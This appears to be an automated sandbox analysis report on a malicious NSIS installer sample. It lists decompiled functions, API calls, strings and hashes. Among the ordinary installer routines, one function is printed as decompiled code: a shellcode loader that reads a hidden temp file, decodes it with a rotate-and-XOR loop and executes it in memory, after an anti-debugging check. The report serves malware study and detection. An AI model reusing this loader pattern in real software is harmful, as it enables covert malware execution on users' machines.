                                                                    • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\AQJEKNHnWK.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                                                    • API String ID: 3079827372-1687950628
                                                                    • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                    • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                                                    • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                    • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405301, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156filestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 98%
                                                                    			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055AC(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x7a3008 =  *0x7a3008 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059BF(0x7a0588, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E00405513(_t74);
					} else {
						lstrcatA(0x7a0588, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x7a0588,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059BF(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D62(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x7a3008 =  *0x7a3008 + 1;
									} else {
										E00404D62(0xfffffff1, _t74);
										E00405707(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405301(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C94(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054CC(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D62(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D62(0xfffffff1, _t74);
							return E00405707(_t74, 0);
						}
						L30:
						 *0x7a3008 =  *0x7a3008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                    0x0040530c
                                                                    0x00405310
                                                                    0x00405319
                                                                    0x0040531c
                                                                    0x0040531f
                                                                    0x00405327
                                                                    0x00405329
                                                                    0x0040532a
                                                                    0x00000000
                                                                    0x0040532a
                                                                    0x00405339
                                                                    0x00405339
                                                                    0x0040533c
                                                                    0x0040533f
                                                                    0x00405353
                                                                    0x0040535a
                                                                    0x0040535f
                                                                    0x00405361
                                                                    0x00405371
                                                                    0x00405363
                                                                    0x00405369
                                                                    0x00405369
                                                                    0x0040537c
                                                                    0x00405391
                                                                    0x00405393
                                                                    0x00405399
                                                                    0x0040539c
                                                                    0x0040539f
                                                                    0x00405461
                                                                    0x00405461
                                                                    0x00405465
                                                                    0x00405467
                                                                    0x00405467
                                                                    0x00405467
                                                                    0x00405467
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004053a5
                                                                    0x004053a5
                                                                    0x004053ae
                                                                    0x004053b4
                                                                    0x004053b9
                                                                    0x004053bc
                                                                    0x004053be
                                                                    0x004053c2
                                                                    0x004053c4
                                                                    0x004053c4
                                                                    0x004053c2
                                                                    0x004053c7
                                                                    0x004053ca
                                                                    0x004053dd
                                                                    0x004053df
                                                                    0x004053e4
                                                                    0x004053ea
                                                                    0x004053ec
                                                                    0x00405407
                                                                    0x0040540e
                                                                    0x00405414
                                                                    0x00405416
                                                                    0x0040543b
                                                                    0x00405418
                                                                    0x00405418
                                                                    0x0040541c
                                                                    0x00405430
                                                                    0x0040541e
                                                                    0x00405421
                                                                    0x00405429
                                                                    0x00405429
                                                                    0x0040541c
                                                                    0x004053ee
                                                                    0x004053f4
                                                                    0x004053f6
                                                                    0x004053fc
                                                                    0x004053fc
                                                                    0x004053f6
                                                                    0x00000000
                                                                    0x004053ec
                                                                    0x004053cc
                                                                    0x004053cf
                                                                    0x004053d1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004053d3
                                                                    0x004053d5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004053d7
                                                                    0x004053db
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405440
                                                                    0x0040544a
                                                                    0x00405450
                                                                    0x00405450
                                                                    0x0040545b
                                                                    0x00000000
                                                                    0x00405341
                                                                    0x00405341
                                                                    0x00405343
                                                                    0x0040546b
                                                                    0x0040546e
                                                                    0x00405471
                                                                    0x004054c9
                                                                    0x004054c9
                                                                    0x004054c9
                                                                    0x00405473
                                                                    0x00405476
                                                                    0x00405481
                                                                    0x00405486
                                                                    0x00405488
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040548b
                                                                    0x00405496
                                                                    0x0040549d
                                                                    0x004054a3
                                                                    0x004054a5
                                                                    0x00000000
                                                                    0x004054c1
                                                                    0x004054a7
                                                                    0x004054ab
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004054b0
                                                                    0x00000000
                                                                    0x004054b7
                                                                    0x00405478
                                                                    0x00405478
                                                                    0x00000000
                                                                    0x00405478
                                                                    0x00405349
                                                                    0x0040534d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040534d

                                                                    APIs
                                                                    • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000), ref: 0040531F
                                                                    • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000), ref: 00405369
                                                                    • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000), ref: 0040537C
                                                                    • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000), ref: 00405382
                                                                    • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000), ref: 00405393
                                                                    • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
                                                                    • FindClose.KERNEL32(?), ref: 0040545B
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
                                                                    • "C:\Users\user\Desktop\AQJEKNHnWK.exe" , xrefs: 0040530B
                                                                    • \*.*, xrefs: 00405363
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\AQJEKNHnWK.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                    • API String ID: 2035342205-3693272536
                                                                    • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                    • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
                                                                    • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                    • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 740D1000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85filememorystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 82%
                                                                    			E740D1000() {
				long _v8;
				short _v528;
				long _t12;
				void* _t16;
				signed char _t22;
				void* _t35;
				long _t38;

				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t12 = GetTempPathW(0x103,  &_v528);
				if(_t12 != 0) {
					lstrcatW( &_v528, L"\\s1min5obsmh");
					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t35 = _t16;
					if(_t35 == 0xffffffff) {
						L12:
						return _t16;
					}
					_t16 = GetFileSize(_t35, 0);
					_t38 = _t16;
					if(_t38 == 0xffffffff) {
						L11:
						goto L12;
					}
					_t16 = VirtualAlloc(0, _t38, 0x3000, 0x40); // executed
					 *0x740d3000 = _t16;
					if(_t16 == 0) {
						goto L11;
					}
					_t16 = ReadFile(_t35, _t16, _t38,  &_v8, 0); // executed
					if(_t16 == 0) {
						goto L11;
					}
					_t22 = 0;
					if(_v8 <= 0) {
						L10:
						_t16 =  *0x740d3000(); // executed
						goto L11;
					}
					do {
						asm("ror cl, 0x3");
						 *((char*)( *0x740d3000 + _t22)) = (0x00000030 - (((0x0000002d -  *((intOrPtr*)( *0x740d3000 + _t22)) - _t22 ^ 0x00000010) + _t22 ^ _t22) + 0x00000067 ^ 0x00000070) ^ _t22) + _t22;
						_t22 = _t22 + 1;
					} while (_t22 < _v8);
					goto L10;
				}
				return _t12;
			}










                                                                    0x740d1009
                                                                    0x740d1018
                                                                    0x740d101a
                                                                    0x740d101a
                                                                    0x740d102c
                                                                    0x740d1034
                                                                    0x740d1047
                                                                    0x740d1066
                                                                    0x740d106c
                                                                    0x740d1071
                                                                    0x740d10f6
                                                                    0x00000000
                                                                    0x740d10f6
                                                                    0x740d107b
                                                                    0x740d1081
                                                                    0x740d1086
                                                                    0x740d10f5
                                                                    0x00000000
                                                                    0x740d10f5
                                                                    0x740d1092
                                                                    0x740d1098
                                                                    0x740d109f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x740d10aa
                                                                    0x740d10b2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x740d10b5
                                                                    0x740d10ba
                                                                    0x740d10ee
                                                                    0x740d10ee
                                                                    0x00000000
                                                                    0x740d10f4
                                                                    0x740d10c0
                                                                    0x740d10d9
                                                                    0x740d10e5
                                                                    0x740d10e8
                                                                    0x740d10e9
                                                                    0x00000000
                                                                    0x740d10c0
                                                                    0x740d10fa

                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 740D1010
                                                                    • DebugBreak.KERNEL32 ref: 740D101A
                                                                    • GetTempPathW.KERNEL32(00000103,?), ref: 740D102C
                                                                    • lstrcatW.KERNEL32(?,\s1min5obsmh), ref: 740D1047
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 740D1066
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 740D107B
                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 740D1092
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 740D10AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.216681387.00000000740D1000.00000020.00020000.sdmp, Offset: 740D0000, based on PE: true
                                                                    • Associated: 00000000.00000002.216677369.00000000740D0000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.216685030.00000000740D2000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.216688943.00000000740D4000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
                                                                    • String ID: \s1min5obsmh
                                                                    • API String ID: 4020703165-2327886
                                                                    • Opcode ID: df1670b13bac20f7994e10929caecb1ddcbd2806c8c7f94592177ef98c55dcc8
                                                                    • Instruction ID: e8a9a929ab12246a660cc3b4fdf5c11434fc17a3e656434b683581c277a1a3e4
                                                                    • Opcode Fuzzy Hash: df1670b13bac20f7994e10929caecb1ddcbd2806c8c7f94592177ef98c55dcc8
                                                                    • Instruction Fuzzy Hash: 2721E732640310AFE7206F728C5EBD67FBCEB01B50F208264EE469A1C1DE74520ECE60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 64%
                                                                    			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x7a3030 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D62(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
				return 0;
			}










                                                                    0x00401fdc
                                                                    0x00401fe4
                                                                    0x00401fe7
                                                                    0x00401ff3
                                                                    0x00402093
                                                                    0x00000000
                                                                    0x00401ff9
                                                                    0x00402001
                                                                    0x0040200b
                                                                    0x0040200e
                                                                    0x0040201d
                                                                    0x0040201e
                                                                    0x00402024
                                                                    0x00402028
                                                                    0x0040208f
                                                                    0x00402095
                                                                    0x00402095
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402010
                                                                    0x00402011
                                                                    0x00402017
                                                                    0x0040201b
                                                                    0x0040202a
                                                                    0x00402034
                                                                    0x00402038
                                                                    0x0040207c
                                                                    0x0040203a
                                                                    0x0040203d
                                                                    0x00402040
                                                                    0x00402070
                                                                    0x00402042
                                                                    0x00402045
                                                                    0x0040204e
                                                                    0x00402050
                                                                    0x00402050
                                                                    0x0040204e
                                                                    0x00402040
                                                                    0x00402084
                                                                    0x00402087
                                                                    0x00402087
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040201b
                                                                    0x0040200e
                                                                    0x0040209b
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                                                      • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                      • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                      • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                      • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                    • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                                                    • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                                                    • SetErrorMode.KERNEL32 ref: 0040209B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 1609199483-0
                                                                    • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                    • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
                                                                    • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                    • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405C94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405C94(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x7a15d0;
			}





                                                                    0x00405ca2
                                                                    0x00405cae
                                                                    0x00405cb6
                                                                    0x00405cb8
                                                                    0x00405cbd
                                                                    0x00000000
                                                                    0x00405cca
                                                                    0x00405cc0
                                                                    0x00000000

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ), ref: 00405CA2
                                                                    • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                    • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                    • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorFindMode$CloseFileFirst
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 2885216544-3916508600
                                                                    • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                    • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                                                    • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                    • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403526, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215stringregistrylibraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x7a2f88;
				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x79f580;
					"1033" = 0x7830;
					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
					__eflags =  *0x79f580;
					if(__eflags == 0) {
						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
					}
					lstrcatA("1033", _t78);
				} else {
					E0040591D("1033",  *_t20() & 0x0000ffff);
				}
				E004037F2(_t75, _t88);
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
				if(E004055AC(_t88, _t84) != 0) {
					L16:
					if(E004055AC(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059E1(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a2768 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E004037F2(_t75, __eflags);
							__eflags =  *0x7a3020;
							if( *0x7a3020 != 0) {
								_t31 = E00404E34(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x7a274c;
								if( *0x7a274c == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x79f560, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x7a2720);
								 *0x7a2744 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x7a2720);
							}
							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x7a2f80;
						 *0x7a2734 = _t28;
						_v20 = 0x624e5f;
						 *0x7a2724 = E00401000;
						 *0x7a2730 =  *0x7a2f80;
						 *0x7a2744 =  &_v20;
						if(RegisterClassA(0x7a2720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x7a1f20;
					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
					_t61 =  *0x7a1f20; // 0x49
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x7a1f21;
						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
